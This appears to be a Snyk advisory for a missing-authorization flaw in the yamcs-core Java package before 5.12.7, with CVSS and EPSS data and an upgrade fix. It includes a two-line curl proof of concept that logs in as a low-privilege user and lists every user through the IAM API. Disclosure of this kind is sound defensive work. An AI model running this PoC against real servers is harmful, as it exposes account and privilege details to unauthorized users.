Missing Authorization Affecting org.yamcs:yamcs-core package, versions [,5.12.7)


Severity

Recommended
0.0
medium
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.03% (9th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Missing Authorization vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JAVA-ORGYAMCS-17229842
  • published8 Jun 2026
  • disclosed27 May 2026
  • creditDaniel Miranda Barcelona

Introduced: 27 May 2026

NewCVE-2026-44595  (opens in a new tab)
CWE-862  (opens in a new tab)

How to fix?

Upgrade org.yamcs:yamcs-core to version 5.12.7 or higher.

Overview

Affected versions of this package are vulnerable to Missing Authorization in the IAM API endpoints, including listUsers, getUser, listGroups, and getGroup. An attacker can retrieve sensitive user information, such as usernames, superuser status, and group memberships, by sending authenticated requests to these endpoints without possessing elevated privileges.

PoC

# Authenticate as any low-privilege user GET access_token
curl -s -X POST "http://localhost:8090/auth/token" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "grant_type=password&username=lowpriv&password=lowpriv123"

# Enumerate all users — no ControlAccess required
curl -s "http://TARGET:8090/api/users" \
  -H "Authorization: Bearer $TOKEN" #paste access_token

CVSS Base Scores

version 4.0
version 3.1